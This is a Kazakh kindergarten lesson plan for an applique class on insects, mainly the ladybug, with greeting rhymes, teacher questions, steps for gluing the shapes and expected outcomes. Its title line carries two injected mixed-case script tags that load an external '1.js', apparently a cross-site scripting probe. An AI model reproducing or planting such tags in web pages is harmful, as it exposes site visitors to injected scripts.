«Жәндіктер (Қаңқыз)» атты ашық сабақ шағын орталық "Балдырған" тобы<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

03.02.2020

Ұйымдастырылған оқу іс-әрекетінің  технологиялық картасы

Тәрбиеші: Соспанова Ж.С. 

Тобы:  «Балдырған» 

Өткізген мерзімі:    19.04.2019

Білім беру саласы: «Шығармашылық»

Бөлімі:   Аппликация

Тақырыбы: «Жәндіктер (Қаңқыз)»

Мақсаты:  Қаңқыз және оның өзіне тән белгілері мен таныстыра отырып әдемі жапсыру  үйрету; Ұсақ қол қимылдарын, есте сақтау қабілеттерін, тілін дамыту; Жәндіктерге деген қамқорлық сезімдерін ояту, балаларды ұқыптылыққа, еңбекке тәрбиелеу;

Көрнекіліктер:  Жәндіктер туралы топтама көрсету, қаңқыздың суреті, желім,ермексаз,тақтайша, сулы орамал;

іс-әрекет  кезеңдері

Тәрбиешінің іс-әрекеті

Балалардың іс-әрекеті

 

Мотивациялық қозғаушылық

     Амандасу:

Біз жақсы баламыз,

Өсті ақыл санамыз.

Қонақтармен  алдымен ,

Амандасып  аламыз.

Сәлеметсіздер ме,қонақтар!

Шаттық шеңбері:

Біз әдепті баламыз,

Шаттық әнге саламыз.

Би билейміз дөңгелеп,

Біз өнерлі баламыз.

Амандасады.

 

 

Балалар шаттық шеңберін жасайды

 

Ұйымдастыру-іздестіру

 

 

-Балалар,қазыр  қандай жыл

мезгілі ?Көктем де қандай өзгерістер болады?

-Көктемде  қаншама жәндіктер пайда болады.Себебі күн  жылына бастайды.

Балаларға жәндіктердің  түрлері, тыныс-тіршілігі туралы мәлімет беру. (Көбелектер,инелік,  аралар, қаңқыздар, т.б.)

-Балалар мынау – қаңқыз. Оның бізге тигізетін зияны жоқ, оны қолға ұстасақ өрмелеп жүреді. Ол қанаттарын жайып ұшады.

-Қаңқыз қайда мекендейді?

-Қаңқыздың дене мүшелерін атаңдар.

-Балалар біз бүгінгі сабағымызда қаңқызды жапсырамыз.

-Қаңқыздың түсі қандай екен балалар?

Сергіту сәті:

Қәне қанат жасайық,

Көбелекке ұқсайық.

Көбелек болып ұшайық,

Ұшып,ұшып  алайық.

Қауыпсыздық ережені естеріне түсіру:

Қаңқыз жапсыру жасалу жолы:

1.Денесін жабыстырамыз

2.Басын  жабыстырамыз.

3. Мұршасын  жасау .

 

Саусақ жаттығу:

Бала,бала,балақан,

Кәне қайсы алақан.

Саусақтарым әйбәт,

Білай,білай  ойнат.

 

4. Қызыл түсті қанатарын жабыстырамыз.

5. Ақ  ермексазбен көздерін жабыстыру.

6. Қара ермексаздан бірнеше ұсақ дөңгелекшелер жасаймыз.

 

-Көктем

Балалар мұқият тыңдайды.

 

 

 

 

  • Қанаты, басы, аяғы, мұртшасы.

-Қызыл түсті,  үстінде қара дақтары болады.

  • Шөпте.

 

 

 

 

 

Балалар педагогтің айтқанына орай қимыл-қозғалыстар жасайды.

Рефлексивті-түзетушілік

Қорытындылау.

Сұрақ-жауаптар.Марадақтау.

 

Балалар сұрақтарға  жауап беруге тырысады.

 

Күтілетін нәтиже:

Біледі:   Қаңқыздың жәндікке жататындығын;

Игереді:  Қаңқызды табиғи материалды пайдалана отырып  жабыстыру;

Меңгереді:  Қаңқыз шөпте мекендейтінін;

 

 

Просмотров: 1399


Пікір қосу



Деректерді қолтаңбаға қосу